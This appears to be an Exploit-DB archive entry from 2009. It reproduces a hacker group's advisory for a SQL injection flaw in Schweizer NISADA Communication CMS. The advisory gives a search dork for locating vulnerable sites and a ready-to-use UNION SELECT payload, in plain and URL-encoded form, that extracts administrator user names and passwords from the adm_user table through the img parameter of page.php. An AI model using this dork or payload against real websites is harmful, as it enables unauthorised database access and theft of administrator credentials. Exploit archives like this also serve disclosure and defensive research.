Schweizer NISADA Communication CMS - SQL Injection

EDB-ID:

10543

CVE:

N/A




Platform:

PHP

Date:

2009-12-18


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

                                                  ALGERIAN HACKER
    **********************- NORTH-AFRICA SECURITY TEAM -***********************

  [!]            Schweizer NISADA Communication CMS SQL Injection Vulnerability
  [!] Author    : Dr.0rYX and Cr3w-DZ
  [!] MAIL      : vx3@hotmail.de<mailto:vx3@hotmail.de>  &  Cr3w@hotmail.de<mailto:Cr3w@hotmail.de>

  ***************************************************************************/

  [ Software Information ]

  [+] Vendor : http://www.nisada.ch/
  [+] script   : Schweizer NISADA Communication CMS
  [+] Download : http://www.nisada.ch/contact.aspx (sell script )
  [+] Vulnerability : SQL injection
  [+] Dork :inurl:"/CMS/page.php?p="

  **************************************************************************/
  [ Vulnerable File ]

  http://server/cms/page.php?p=1&img=[N.A.S.T ]



  [ Exploit ]

  http://server/cms/page.php?p=1&img=-1+UNION+ALL+select+1,2,3,4,5,GROUP_concat(CONVERT(num USING utf8),0x3a,CONVERT(user USINGutf8),0x3a,CONVERT(pswd USING utf8)),7,8,9,10,11,12,13,14+from+adm_user


  [ ExOMPLE ]
  http://server/cms/page.php?p=1&img=-207+UNION+ALL+select+1,2,3,4,5,GROUP_concat%28CONVERT%28num%20USING%20utf8%29,0x3a,CONVERT%28user%20USING%20utf8%29,0x3a,CONVERT%28pswd%20USING%20utf8%29%29,7,8,9,10,11,12,13,14+from+adm_user

  [  GReet ]

  [+] :claw ,xCv-DZ , HIS0K4 ,le0n ,www.arab-zone.org , exploit-db.com , ALL HACKERS MUSLIMS